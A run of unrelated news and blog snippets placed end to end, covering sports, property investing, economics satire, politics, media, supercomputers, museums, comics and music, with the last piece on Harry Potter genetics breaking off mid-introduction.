Going forward : The 2013-14 season was a contract season for Lewis , who parlayed his second half scoring and constant hustle into a two-year , $ 3.05 million extension shortly before the playoffs began . A former first round draft pick who has emerged as an effective forechecker , penalty killer and battler in a bottom-six role , Lewis provides character and continuity and while questions of his offensive ceiling appear to have been answered ( barring any sharp rise in his shooting percentage ) , he 'll continue to play a similar role under Darryl Sutter . The upcoming two years will be his 27 and 28-year-old seasons , so there should n't be hope or concern over any sharp deviation away from his mostly steady career tendencies .
2013 Lewis evaluation
2012 Lewis evaluation
2011 Lewis evaluation
2010 Lewis evaluation
2009 Lewis evaluation
2014 Player Evaluations
# 2 – MATT GREENE | # 6 – JAKE MUZZIN | # 8 – DREW DOUGHTY | # 10 – MIKE RICHARDS | # 11 – ANZE KOPITAR | # 12 – MARIAN GABORIK | # 13 – KYLE CLIFFORD | # 14 – JUSTIN WILLIAMS
Growing up in housing commission with a single mum in the Mount Druitt area on Sydney 's outskirts , Edward Dilleen has bucked the trend and accrued a portfolio of six investment properties . And he 's only 24 .
But it 's not wealthy parents or a high-paying job that has allowed him to leapfrog many other 20-somethings yet to even buy a first home . It 's property know-how and goal setting from an early age .
“ I want to get to the stage where I 'm able to purchase my dream house . Whether that 's acreage or whether it 's a beachfront , I 'm not quite sure yet , but it 's something where I just want to have that security there , ” Mr Dilleen said .
“ I do n't want to have to be worried about money . Growing up I felt helpless and it 's something I never want to feel again . ”
Working at McDonald 's part-time for several years of high school , reading property investment books in his spare time , he managed to save about $ 20,000 . This became his deposit and costs for a $ 138,000 apartment in Tuggerawong , NSW , which he bought at 19 .
“ I do n't want to have to be worried about money . Growing up I felt helpless and it 's something I never want to feel again. ” Edward Dilleen
Two years later , living at home with his mum and continuing to save , he used some savings and some equity growth in the Tuggerawong property to purchase a townhouse in Elizabeth South , South Australia for under $ 150,000 .
After a year-long break , he went on a buying spree . In 18 months from January 2015 , he bought four properties , including three apartments in Queensland and another townhouse in South Australia .
Today , he has $ 1.17 million worth of real estate in his portfolio with a debt level of 69 per cent and a salary under $ 50,000 at a new job in customer service with property investment firm Binvested – though said he built his portfolio before joining the company .
“ I want to have 10 [ properties ] before I 'm 26 , ” he said , already planning to buy the seventh before the end of 2016 .
When being paid a modest income , the trick to accruing many properties was making rental yield a strong focus , he said .
A rental return of 5.2 per cent is a rule of thumb when investing , which equates to $ 100 of weekly rent for every $ 100,000 of the property value . But he aims for gross rental yields in excess of 10 per cent .
Many of his sub- $ 150,000 purchases rent for in excess of $ 250 a week . This means the rent paid by the tenant covers not only the mortgage repayment , but also council fees , bills and necessary repairs .
His property portfolio returns $ 1500 a week , or about $ 200 a week in his pocket after costs . He uses this money to pay down the mortgages further , build a security buffer and save for future investments .
A property Edward purchased in South Australia . Photo : Supplied
To reach his goal of owning 10 properties , he is considering taking on a second job as a bartender at a local pub to ramp up his income .
But investing and accumulating many properties at a young age with income limitations is a difficult prospect for many , Pass Go Home Loans managing director Jamie Moore said .
For others to invest in these circumstances , he recommended living at home with the parents and paying no rent or board , or renting somewhere cheap .
Young investors should also have “ no other debt ” and focus on positively-geared properties , “ because lenders will only use 80 per cent of gross rental income – and some lenders will place a cap on the rental yield they 'll take into account ” .
Lenders with a generous borrowing capacity calculator , careful planning of which lenders to use at certain points and a cash buffer to mitigate risk would also be crucial , he said .
Young investors should also embrace delayed gratification , Binvested buyer 's agent Nathan Birch said .
“ Yes , the dream home in a dream suburb might be unachievable straight up but there are other suburbs that may be more affordable right now . All successful people started at the bottom and worked their way up , ” Mr Birch said .
“ Change your strategy , buy investment properties in affordable areas and then work your way up to a dream home . ”
Young Australians could also consider maximising their income in the sharing economy , through sites such as Uber , Upwork and Airtasker , he said .
Mortgage Choice chief executive John Flavell recommended undertaking a significant amount of due diligence before buying a property – researching where provides the best yields .
“ After researching the market , it is important for investors to consider what they want from their investment property , ” Mr Flavell said .
“ Many people make the error of believing property investment will make them millionaires overnight . This is simply not the case , ” he said .
How would extraterrestrial anthropologists characterize Earth 's dominant socio-economic system ? It 's not difficult to imagine their dismaying report :
“ Earth 's economy glorifies waste . Its economists rejoice when a product is disposed as waste and replaced with a new product . This waste is perversely labeled ‘ growth . '
Aimless wandering that consumes fossil fuels is likewise rejoiced as ‘ growth . '
The stripping of the planet 's oceans for a few favored species of edible fish is also considered ‘ growth ' as the process of destroying the ocean ecosystem generates sales of the desired seafood .
Even more perversely , the resulting shortages are also causes of rejoicing by the planet 's elites , as their ability to purchase the now-scarce resources boosts their social status and grandiose sense of self-worth .
This glorification of waste is the same dynamic that destroyed the civilization on Zork .
Earth 's economy also glorifies exploitation , as this maximizes profits , which appears to be the planetary equivalent of a secular religion that everyone believes as a Natural Law .
Thus slavery and monopoly are highly valued as the most reliable sources of profits . If ethical concerns limit the actual ownership of humans , Earth 's economy incentivizes feudal arrangements that share characteristics of servitude and bondage . In the current era , the favored mechanisms are over-indebtedness ( debt-serfdom ) and taxation by the state , which extracts approximately 40 % of all labor via threat of imprisonment .
Earth 's elites exhibit a pathological preference for micro-managing the commoners via criminalizing much of everyday life and imposing extremely harsh punishments for any dissent or resistance to elite domination .
This is the same dynamic that doomed planetary civilizations in the Blug system .
Earth 's economy is currently dependent on depleting fossil fuels and borrowing from the future to fund consumption in the present , i.e . debt . Rather than face the reality that this is not sustainable and pursue other arrangements , Earth 's elites have chosen expediency , responding to the inevitable crises caused by depletion and dependence on debt with expedient but ultimately destructive policies that paper over the crises but at the cost of generating greater crises in the next iteration .
Humanity appears to default to magical thinking when faced with untenable situations that demand systemic change . This is eerily parallel to the now-lost civilization of Frum .
It seems Earth 's dominant species has selected the most destructive policies and mindsets to glorify and worship . Earth 's current civilization is doomed , with near-zero prospects for the necessary transition to a more sustainable , less exploitive arrangement .
Earth 's decline is a tragi-comedy , much like the one on Ononon that entertained our home planet audiences for a time . ”
In case you missed it , here 's a snapshot of total debt as a percentage of median household income : from 79 % to 584 % . If this strikes you as “ healthy growth ” because “ debt does n't matter ” – welcome to the Wonderland of Magical Thinking .
If you found value in this content , please join me in seeking solutions by becoming a $ 1/month patron of my work via patreon.com .
There are a lot of things I would do if I had the money – buy a nice car , travel the world , give to charities , etc . But for the audiophile in all of us , upgrading your sound system is also likely on that list . I do n't have a producer 's set up with KRKs or anything ( I have a modest Klipsch 2.1 , but it gets the job done ) , but in a world where money did n't matter , I would splurge .
Enter ixoost ‘ s custom-made sound systems , fashioned from the exhaust pipes – “ the real heart of an automobile engine ” – of Formula 1 race cars .
These absolutely beautiful creations are all “ tailor made and crafted by hand for the customer. ” Prices start at € 5250,00 ( $ 5500 USD ) and you can choose between three exhaust models .
[ T ] hrough their series of individual dock stations , compatible with smartphones and mp3 players , ixoost translates the importance of sound projected from supercars and their motors during competition , into unique devices for listening to your own musical soundtracks ; offering iconographic transformations of everyday mechanics into functional objects for personal use .
[ foogallery id= ” 119094″ ]
Source & Photos via Design Boom & ixoost
President Trump denounced anti-Semitism Tuesday after coming under pressure to address an uptick in incidents targeting Jewish institutions across the U.S .
“ Anti-Semitism is horrible and it 's going to stop and it has to stop , ” Trump told MSNBC during a tour of the National Museum of African American History and Culture .
Trump on denouncing anti-Semitic attacks : `` I do it wherever I get a chance . '' https : //t.co/uJSL7I6CAS — Kyle Griffin ( @ kylegriffin1 ) February 21 , 2017 The president insisted he has spoken out against anti-Semitism “ whenever I get a chance , ” even though he has refused to confront the issue directly on multiple occasions .
ADVERTISEMENT
`` This tour was a meaningful reminder of why we have to fight bigotry , intolerance and hatred in all of its very ugly forms , '' he said later . `` The anti-Semitic threats targeting our Jewish community and community centers are horrible and are a painful and a very sad reminder of the work that still must be done to root out hate and prejudice and evil . ''
The comments come one day after a wave of bomb threats caused 11 Jewish community centers to temporarily close . The terrorizing phone calls have targeted 54 community centers in 27 states this year alone . Federal investigators are looking into the source of the threats .
Vandals also toppled dozens of headstones on Monday at a historic Jewish cemetery in St. Louis .
Jewish groups have been frustrated by what they say is Trump 's lackluster response to the incidents .
During a joint news conference last Wednesday with Israeli Prime Minister Benjamin Netanyahu , Trump responded to a question about anti-Semitism by citing the size of his Electoral College victory and referencing his Jewish son-in-law , White House aide Jared Kushner , and his daughter Ivanka , who converted to Judaism when she married Kushner .
Trump said only that he would `` stop long-simmering racism ” but did not specifically refer to anti-Semitism .
Trump responded to a Jewish reporter the next day who asked him a question about the incidents by telling him to `` sit down '' and accusing the reporter of misleading him .
The president insisted he is “ the least anti-Semitic person that you 've ever seen in your entire life . ”
Jonathan Greenblatt , the national director and CEO of the Anti-Defamation League , called Trump 's response “ mind-boggling ” and “ shocking . ”
“ The issue of anti-Semitism is not a political one , ” he wrote last week in The Washington Post . “ But it is potentially lethal . With the president 's leadership , it can get better . With his neglect or instigation , it can get worse . ”
The White House also stirred controversy in January by releasing a statement on Holocaust Remembrance Day that did n't mention the Nazis ' focus on exterminating Jews . Top Trump officials later defended the decision .
Trump 's team has begun to address the problem in recent days .
Ivanka Trump on Monday called for “ religious tolerance ” after Jewish community centers received the phoned-in bomb threats .
“ Hatred and hate-motivated violence of any kind have no place in a country that was founded on the promise of individual freedom , ” White House press secretary Sean Spicer told NBC News on Monday .
Love stories are meant for everyone . In the bedtime stories we heard as children , it was completely okay for a princess to fall in love with a frog or a beast even , but never with another princess .
When these tales were translated on screen , the stories were somehow still restricted to the heterosexual realm . But Roopa Rao 's latest web series about same-sex love , The Other Love Story , is about to change that .
The Other Love Story , which is slotted for release next week , is exciting for multiple reasons . First , it tells the tale of two women falling in love at a time when homophobia was still rampant in India . Secondly , it is set in the 90s , an era before the Internet and mobile phones took over our lives , when we still had to rely on love letters and landlines to exchange sweet nothings . Finally , Roopa was able to raise money for the film through crowd funding , which shows the appetite that Indian audiences have for offbeat narratives .
The popularity of YouTube has lead to a certain democratisation of media , which has helped filmmakers address issues that are traditionally considered taboo . Web-series often take a step back from elaborate sets and melodrama to address pressing topics that need to be discussed . The Other Love Story is not the first Indian web series that discusses homosexual love in a serious manner . In April , a new web-series titled All About Section 377 was lauded for its representation of the LGBT community in mainstream media .
Roopa claims she was inspired to make this series because she was frustrated with the fact that in mainstream media lesbianism has become synonymous with porn .
The series traces the love story between two neighbours , Adhya and Aanchal , who live in Bengaluru . The dialogues are in English , Hindi and Kannada . Roopa told Deccan Chronicle , “ Today one can go online and find so much information and groups that support them , but back in the '90s there was nothing . This story follows how two neighbours meet , feel something and slowly find the courage to work on their feelings . ”
Watch the teaser here !
Like this story ? Or have something to share ? Write to us : contact @ thebetterindia.com , or connect with us on Facebook and Twitter ( @ thebetterindia ) .
China holds the top two spots for fastest computers in the world , and Switzerland holds the third , with the U.S. in the fourth , fifth and sixth spots.The Top500 list of the most powerful supercomputers in the world was released at the 2017 International Supercomputing Conference in Frankfurt , Germany.But the U.S. might not miss its top spot for long . The Department of Energy awarded six companies a total of $ 258 million last Thursday to further the research and development of the world 's first exascale supercomputer . There are no computers that powerful today.The U.S. formerly held the third spot , but this time it was edged out by a system from the Swiss National Supercomputing Centre , which moved up from eighth place . This is only the second time in 24 years of compiling the Top500 list that the U.S. did not have a computer place in one of the top three positions.These computers process at petascale speeds , meaning their capabilities are measured in terms of one quadrillion ( 1,000,000,000,000,000 ) calculations per second . To put that in perspective , consumer laptops now operate at gigascale , which is one billion calculations per second.An exascale computer is capable of processing a quintillion ( 1,000,000,000,000,000,000 ) calculations per second . That 's about a trillion times more powerful than a consumer laptop.Exascale-level computing would allow scientists to make extremely precise digital simulations of biological systems , which could uncover answers to pressing questions like climate change and growing food that can withstand drought.The more powerful the computer , the more realistic the models are , which in turn provide scientists with more reliable predictions about the future and more concrete recommendations about what companies and governments need to do.Here 's a list of the Top 10 most powerful supercomputers in the world . The U.S. holds the most spots on the list , with five supercomputers that made the cut.1 . Sunway TaihuLight — China2 . Tianhe-2 ( MilkyWay-2 ) — China3 . Piz Daint — Switzerland4 . Titan — United States5 . Sequoia — United States6 . Cori — United States7 . Oakforest-PACS — Japan8 . K Computer — Japan9 . Mira — United States10.Trinity — United States
Museum collections ( stock image of the Natural History Museum ) are dominated by male animals with their flashy antlers and feathers
They may seem like a harmless place to take the children at the weekend to learn about whales and dinosaurs .
But natural history museums are sexist and colonialist , according to an academic at University College London .
Museum collections are dominated by male animals with their flashy antlers and feathers , leaving females , often described as ' mothers ' , in the minority .
Meanwhile , according to Jack Ashby at UCL , the displays are dominated by animals from countries formerly part of the British Empire , such as India and Australia .
The manager of the Grant Museum of Zoology at UCL believes there are human 'biases ' in the way nature is represented .
He said : 'Historically , in many cases , particularly where males and females were different , and males had big horns , antlers , tusks or particularly showy plumage like a peacock , this created a bias in what was collected . '
Australian species dwarf those from China in British museums , he said , adding : 'Collecting is part of the act of colonialism . '
The museum manager spoke out following a University of Manchester study which found one museum 's mammal collection was 71 per cent male and 29 per cent female . Two-thirds of birds in the same institution were male .
But his comments have been challenged by Alan Smithers , professor of education at the University of Buckingham , who said : 'Sexism and colonialism are in the eye of the beholder . It has become too fashionable to search these out wherever there might be some hint of a difference .
' I suspect males are over-represented because they are less intelligent and more likely to get caught . When it comes to colonialism , these were the countries most often explored . Why attempt to create a problem where there is none ? '
Mr Ashby said he is not critical of museums , while noting that the large blue whale skeleton newly installed in London 's Natural History Museum is female ( SUBS – PLS KEEP ) . He said : 'There are 1.5 million species described in the natural world and you ca n't have one of everything on display . I just want to describe that museums are a product of their own history . '
An academic at University College London ( pictured ) said natural history museums are sexist and colonialist
But the bias in how we talk about animals is a subject in his book Animal Kingdom : A Natural History in 100 Objects .
Writing on the website The Conversation , he references the Manchester University study showing that female animals are usually described as 'mothers ' , while the males are discussed as hunters or in a role separate to parenthood .
His article states : 'We have to wonder what messages this might give museum visitors about the role of the female . '
Museums have lots more big animals and creatures with backbones than nature does , Mr Ashby notes , while people do not like 'gross ' specimens such as the Grant Museum 's bisected cat .
He discusses 'political motivation ' to increase knowledge of animals from particular countries .
The academic concludes : 'Museums are rightly celebrated as places of wonder and curiosity , and also science and learning . But if we look closely we can see that there are human biases in the way nature is represented . The vast majority of these are harmless foibles , but not all . '
The Federal Bureau of Investigation ( FBI ) has issued some sobering statistics on child pornography in the United States . PHOTO : MGN
The Federal Bureau of Investigation ( FBI ) has issued some sobering statistics on child pornography in the United States .
In a posting to the agency 's website titled `` The Scourge of Child Pornography , '' the FBI states `` there is still much work to be done . '' As an example , the report cites a February case in Arizona where a woman was found mailing her jailed husband images of girls as young as 9-years-old .
The report states many of the people who engage in the production and distribution of child pornography come from all walks of life and most do n't even have a criminal history . Many of the crimes are carried out on the `` dark web , '' also know as Tor -a browser which allows users to remain anonymous .
Among the eye-opening statistics shared , a Department of Justice 2016 report shows one website on Tor hosted 1.3 million images depicting children subjected to violent sexual abuse . Analysis of these specific files identified at least 73 new victims previously unknown to law enforcement .
The National Center for Missing & Exploited Children ( NCMEC ) estimates over 26 million sexual abuse images and videos were received by their analysts in 2015 alone . Since 2002 , more than 10,500 victims depicted in child porn have been identified by police .
One website on the dark web was shown to have 200,000 registered users and 100,000 individuals had accessed the site in just 12 days .
By IVES GALARCEP
Brian McBride , Kristine Lilly and Bob Bradley have been elected to the 2014 class of the National Soccer Hall of Fame .
Lilly was honored after a national team career that saw her play in a world record 352 games for the United States between 1987 and 2010 .
McBride , a veteran of three World Cups , joined Lilly as a first-ballot inductee into the Hall of Fame after a career that saw him play 95 times , scoring 30 goals for the national team .
Bradley enters the Hall of Fame after 13 years of coaching soccer at the highest levels in the United States , both in MLS with the Chicago Fire , New York/New Jersey MetroStars and Chivas USA , and with the U.S. Men 's National Team from 2007 to 2011 .
The date and location for the induction ceremony have yet to be determined .
Here is a video tribute to the 2014 National Soccer Hall of Fame class :
http : //player.ooyala.com/iframe.js # pbid=MzA3Y2QyZTc2MGNjN2U3ODgxNmNmNzVj & ec=trc250azrKGWWBtoyOU5jKJuYQ1AoMwy
What do you think of this trio of Hall of Fame inductees ? Who missed the cut that you felt should be inducted ?
Share your thoughts below .
Dec 13 , 2015 ; Jacksonville , FL , USA ; Jacksonville Jaguars defensive lineman Jared Odrick ( 75 ) waves to the crowd against the Indianapolis Colts in the second quarter at EverBank Field . The Jaguars won 51-16 . Mandatory Credit : Jim Steve-USA TODAY Sports
The Oakland Raiders could use some help along the defensive line , and Jared Odrick would be a perfect fit .
Oakland Raiders linebacker Khalil Mack is a supernatural being , already establishing himself as one of the NFL 's premiere players at just 26 years young . Despite Oakland recording a league-low 25 sacks , Mack was still dominant enough to win the Defensive Player of The Year award .
But despite all of that , in order to be a serious championship contender , Oakland must fill several gaps on the defensive end , especially on the interior . Jared Odrick is the man for the job .
Jared Odrick made a splash on social media on February 20 when he called out the Jacksonville Jaguars for cutting him by literally giving them the middle finger .
Severing ties is a part of sports , and Odrick 's release may have been rightfully warranted . In 2016 , Odrick battled nagging injuries and was reduced to just six games . In those games , Odrick recorded just 12 tackles , a forced fumble and a sack .
Ironically , that one sack is more than Raiders ' nose tackles Dan Williams and Justin Ellis combined .
Perks
When healthy , Odrick has proven to be a solid contributor , posting 29 tackles and 5.5 sacks in his opening season with the Jags . Over his seven-year career , Odrick has notched 23 sacks and 5 forced fumbles . In that span , he 's tallied 15 pass deflections , exhibiting awareness and active hands .
Odrick played both tackle and defensive end during his five seasons with the Miami Dolphins . His versatility would prove valuable to Oakland , allowing defensive coordinator Ken Norton Jr. to try new looks .
Contract
Coming off a hobbled season , Odrick 's value is brought slightly down , impacting his price tag . If Odrick does n't oversell himself , Oakland will provide him with an opportunity to play for a winner . If the numbers are right , the Raiders can come away with a veteran player and still have some cash to spend .
Is it really only ten years since Dan DiDio , smuggled into DC by Warners as a co-writer on Superboy with Jimmy Palmiotii , was made a Vice President – Editorial , and began his rise to power within the company , making publishing changes along the way and ultimately seeing his vision for the company accepted , with the New 52 ?
For a time he was nicknamed “ Shooter ” at the company , for his pursuit of broad brush policies , which coming from Mike Carlin was never going to be a compliment . Then he picked up the sobriquet “ Jemas ” because of his micro management in a number of books , to the despair of the writers . But now ? Now he 's Dan DiDio , and credited with being the saviour of DC Comics .
This weekend on Facebook , Dan DiDio chronicled his ten high points of his first ten years as an executive at DC Comics , in chronological order as he best remembers it . Here they are , threaded together…
1 ) BATMAN 608 HUSH . Work on this incredible run by Jim Lee and Jeph Loeb was started before I joined DC Comics but came out my first year there . The success of this series , putting a superstar team on the ongoing title instead of a miniseries ( thanks Jim ) , showed that the periodical series still mattered , now more than ever . On the personal side , it was important to me because this run on was so successful that it allowed us to experiment ( both good and bad ) on the rest of the line while we began chartering the course for the DC Universe . The cover stated “ It Begins Here ” , and in my opinion , it really does .
2 ) IDENTITY CRISIS . Now , I 've never been able to shy away from controversy ( although I do think I 've mellowed a bit ) , and this was first real controversial project of my time . This mini-series , ( brilliantly written by Brad Meltzer and drawn by Rags Morales ) created a complex and compelling story that would have once been considered an Elseworlds , and instead , placed it in the center of the DCU . It tackled tough issues and pitted hero versus hero and set the tone for things to follow . Personal note , for me , it perfectly captured the paranoid and unease of the post 9/11 world and put our heroes in touch we what people we 're feeling today , which is exactly what I was hoping to inject in the DCU .
3 ) GREEN LANTERN : REBIRTH . We have done a lot of re-launches , re-starts and reboots over the last ten years but this is my first , and arguably , our best . Geoff Johns ( remember that name , you 'll hear it again ) and Ethan Van Sciver found a way to take everything that came before , and without casting it aside , returned Hal Jordan and Green Lantern to premiere status . Geoff 's love for all things DCU shone through every page , and he brought that energy and sense of respectful re-invention to Teen Titans , Hawkman and so many other books . For me , this reminds me of the all the fans questioning why we brought Hal back from the dead .. And as I liked to remind people , for the time that Hal was “ dead ” , he appeared in more series than when he was “ alive ” . Only shows how popular he was .
( Before we more onto number 4 , have to admit , I cheated a little and looked up some release dates to some of our series to make sure keep this in some sort of chronological order . )
4 ) SUPERMAN/ BATMAN 8 : SUPERGIRL . Now Jeph Loeb did an amazing job re-inventing World 's Finest for an all new audience with Superman/ Batman , but it was n't until issue eight that this series made its mark on the DCU . With the return of Kara Zor-El , one of the biggest walls from the epic series Crisis on Infinite Earths came tumbling down . Beautifully drawn by Michael Turner , Supergirl returned with the full grandeur she deserved . I know for some fans Supergirl will always be a protoplasmic matrix from a pocket dimension that merged with a devil worshipping teenager before being infused with the Angel of Fire , but for most , she will always be Superman 's cousin . It 's really that simple , and that 's why she came back .
On a personal note , this is where my brief but lasting friendship with Michael Turner began , he left a lasting mark and he is missed .
5 ) COUNTDOWN TO INFINITE CRISIS . 80 pages for a buck , what 's not to like ? Probably my favorite comic of all things published in the last ten years . Perfectly crafted by the first , true architects Greg Rucka , Judd Winick and Geoff Johns , ( and a little unaccredited help from Brad Meltzer ) it truly captured the scope , spectacle and humanity of the DCU . Arguably ( there 's that word again ) the best Blue Beetle story , it took us through all facets of the DCU as we followed one man 's struggle against all odds , never giving up , but ultimately failing . This story a sense of unexpected to the DCU that made even the most jaded fan wonder what would happen next . Personal side , I remember I could barely sleep the nights before this book came out , since the next two years of story hinged on its success . It was an all in bet that paid off in a very big way .
6 ) INFINITE CRISIS . Well , we had to count down to something . When we planned to do our first company crossover , I knew only one person could write it . Geoff did a masterful job bringing all the stories of the last year and half to a single point and crescendo . All the sign posts led here . Death of Blue Beetle , Wonder Woman killing Max Lord , Destruction of Watchtower , Day of Vengeance , OMAC Project , Rann/ Thannagar War and Villains United , everything played out brilliantly . Geoff brought the characters to life , and Phil Jimenez ( with help from George Perez , Ivan Reis and Jerry Ordway ) brought them form , and together they did the impossible , they created the perfect sequel to the original , seminal maxi-series . To me , it 's my first , and our best . I never tire of reading it , and someday , maybe when 's itbeing an absolute , we can print all our notes of how this came to be and what was supposed to happen after… maybe : )
7 ) 52 . DC 's first , year long , weekly series . I know there were weekly series in the UK before this , but this was the first time we tried to do something on this scale in the U.S. We distributed comics weekly , so it only made sense that we made a comic that was weekly too . A bit naive , but why should that stop us .
The original plan was to fill in the missing year from the One Year Later jump ( done in real time ) but when you put together a writing team of Geoff Johns , Greg Rucka , Mark Waid and Grant Morrison , the best thing to do is let the creators take their course , and craft a masterful tale . Geoff represented the present DCU , Mark knew its history , Grant had the scope , and Greg kept it grounded , and together they wrote every issue and made secondary characters like Booster Gold , Elongated Man , Steel , Black Adam and Question top sellers . And let 's not forget Keith Giffen on layouts and JG Jones on covers making this a complete package . We must have done something special here , as we did with Countdown To Final Crisis and Trinity , or other companies would have followed suit . They never did .
Infinitely proud of this masterful accomplishment , and while we 're on it , let me set record straight . I have never been more proud of what we accomplished on this series , after all , it was originally my idea , I assembled the writing and art teams , created the production method , sold the idea inside and outside the company , and cleared the way for the creators to take charge of the book . Of course there were bumps along the ways ( with this much creative power , how could n't there be ? ) but to say I hated it is just plain silly .
…
Filling in the last three spots was more difficult than I thought it would be . Not because there was nothing to choose from , instead , it was quite the opposite . There were several more than worthy series that deserved to be on this list . New Frontier ( Darwyn Cooke 's brilliant take on the early days of the DCU ) , Seven Soldiers of Victory ( Grant Morrison 's epic re-imagining of the team ) , All Star Superman ( one of the finest complete stories featuring The Man of Steel ) All Star Batman and Robin ( audacious yet incomplete ) and Wednesday Comics ( Mark Chiarello 's love letter to a soon-to-be forgotten format ) , to name a few . And while they all stood out from the rest , they did n't exactly fit the criteria I had for the top ten . So , sure to cause some discussion , the final three…8 ) SUPERMAN EARTH ONE . This is slightly out of order , but wanted to slot it eighth . When we produced original graphic novels , we usually came at our characters from the sides . The material was either very eclectic , tied to continuity , or rendered our characters unidentifiable . With the bookstore market growing at the time , we decided to meet it head on with new interpretations built for today ( Remember , this was started way before there was talk of a New 52 ) . Joe Straczynski not only built a new man of tomorrow but crafted the story as a true book , and not just a series of issues strung together . It was a new take on Superman 's origin that stood on its own , and Shane Davis brought the look that dubbed him Twilight Superman . On the personal side , I wanted this book to work to show that “ one size ” does n't always fit all and different formats require different styles of storytelling . Its success paved the wave for more series as well as imitation .
9 ) BATMAN , GREEN LANTERN , and the Five Year Plan . Or better known as , how The Sinestro Corps War and Batman R.I.P . got me through the toughest part of my career . First , some backstory . In late 2007 , and into 2008 , we hit a rough spot . Our delivery was shaky , several series were starting to struggle for direction , and our next big event felt rushed ( too many crises too soon ) . Yet , whatever pressure we were feeling across the line , it did not appear evident in Green Lantern and Batman . Geoff had a five year plan for GL that would see that character from Rebirth to The Blackest Night , and Grant Morrison had the same for Batman , starting with Batman R.I.P . Batman R.I.P . preformed the herculean task of crossing over with an event book , Final Crisis yet positioned the story of “ The Death Of Batman ” to stand on its own if read separately . The Sinestro Corps War showed that you could keep the spectacle in the main title so the on-goings can have events unto themselves . On the personal side , they were the solid ground needed to regain our footing , and a reminder that consistency in story and character , and planning , will win out over the usual bags of tricks , if the usual bag of tricks is overplayed .
Which takes us to our final entry… .
10 ) THE NEW 52 . If you look at everything I 've mentioned from one to nine , it feels like we were building to this moment . All that we learned over the years , from every success and mistake came into play as we terraformed the entire DCU . And , it was everything we hoped it would be , a positioning of our line and characters for the future and a shot of adrenalin to the entire industry . It was a wild mix of soft changes , hard reboots , and re-imagination with the hope of finally capturing a bigger audience with a wider diversity of product . And even if we returned to pre-52 sales numbers tomorrow ( and do n't worry , that 's even close to happening ) this would be , hands down , the biggest success I even experienced . And the best part of all this is , we 're not done yet , this is our universe for the future , and it is a foundation worth building on . To quote one of my favorite philosophers , “ Nuff said . ”
So there you have it , my top ten highlights of my first ten years . Thanks for reading along , it was fun taking this troll down memory lane with you . And before you ask about BEFORE WATCHMEN , do n't worry , I 'm saving that to be number one on the list for the next ten years .
Donald Glover 's set alone was worth the two flights and hour-long drive to Alabama .
Oh , you wan na be Childish Gambino , do you ? Well here 's what you have to do :
1 . ) Give the most inspired , electrifying , and explosive performance of Hangout Fest so far . ( Sorry , folksy singer-songwriter types . But did you pull a crowd that looks like this ?
2 . ) Start your set off stage .
3 . ) No , like WAY off stage . Preferably near a guy who looks like Kid Rock .
4 . ) Stay hydrated .
5 . ) Hire a highly skilled backing band that brings the funk and the R & B and feels like The Roots added a female keyboard player to their roster .
6 . ) Serve hyper-literate , sexual yet self-aware , neurotic , digitally obsessed philosophical Gambino realness on prime cuts from Camp and Because The Internet , like `` Heartbeat , '' `` Pink Toes , '' `` Sweatpants , '' and `` Crawl . '' Also , do n't hesitate to perform `` Black Faces '' IN ALABAMA . Also , do n't hesitate to sing just as well as you rap .
7 . ) Also ? Turn way the f * ck up . Like the ENTIRE way up . Then stay that way .
8 . ) Stop your set to help find a lost child ( this actually happened . )
9 . ) Dance like you just checked your bank account and it said you never have to check your bank account ever again .
10 . ) Bring out your brother Stephen , because family .
11 . ) Burn through this entire set list with the fiery intensity of an entire Independence Day 's worth of Roman candles .
12 . ) Exit stage right leaving shirt behind . Because Alabama sun , and because Childish Gambino got that swagger .
+ Watch Childish Gambino perform `` IV . Sweatpants '' at the 2014 Hangout Festival :
Pending a green light from owner Dietrich Mateschitz , Red Bull will stay in formula one with Renault engines next year .
That is the claim of Germany 's Sport Bild , and if true it will mean the end of the engine supply crisis that threatened to push the energy drink stable off the grid .
One by one , alternative plans to run Mercedes , Ferrari and even Honda power next year were ruled out , meaning efforts were re-focused on finding a solution involving Red Bull 's existing partner Renault .
However , the French carmaker is reportedly poised to announce its Lotus buyout and return to full works team status later this month in Abu Dhabi .
So the Red Bull solution , according to Sport Bild correspondents Ralf Bach and Bianca Garloff , will probably involve the Renault 'power units ' being re-branded as Infiniti in 2016 .
And that may just be a one-year , stop-gap solution , before the FIA 's plan to introduce a parallel engine formula based on Indycar 's twin-turbo V6 and involving an independent supplier hits the paddock .
Some have suggested the affordable 'client engine ' idea is simply a complex political ploy by Jean Todt and Bernie Ecclestone .
But Red Bull 's Dr Helmut Marko told Der Spiegel that he had a `` very long and constructive discussion '' with the FIA president in Mexico and `` he ( Todt ) has promised us '' that the parallel engine regulations will be introduced .
Marko said that Red Bull will accept one more year in the F1 midfield as the team takes a `` longer term perspective '' of the unfolding situation .
All that is missing now is for Mateschitz to rubber-stamp the Infiniti-branded Renault deal for 2016 , which he is expected to do before November 20 .
Toro Rosso , meanwhile , appears set to switch to 2015-specification Ferrari power .
Red Bull Racing team boss Christian Horner said recently he is confident Mateschitz wants to stay in F1 .
`` He recognises the commitment and the skill and determination of the team , '' he said . `` He wants to find a solution going forward , he is committed to helping that and behind the scenes is involved in numerous discussions to try and facilitate that , '' Horner added .
( GMM )
Wizards do n't necessarily beget wizards in the world of Harry Potter . Although two magical parents or one magical parent and one non-magical parent usually results in a magic-wielding offspring , you frequently get characters like Hermione , who have two non-magical parents , and sometimes squibs like Mr. Filch , people who ca n't wield magic despite being born to a witch and a wizard . So how is the wizarding gene passed down ?
JK Rowling has claimed that the magic gene is dominant , but that 's left many fans unsatisfied . If it 's dominant , how come neither of Hermione 's parents possessed magical abilities ? Potter fan Andrea Klenotiz decided to try applying her knowledge of genetics to Rowling 's world , and claims she has come up with a scenario for a dominant magic gene that accounts for squibs and Muggle-borns that goes beyond Punnett squares . She starts :
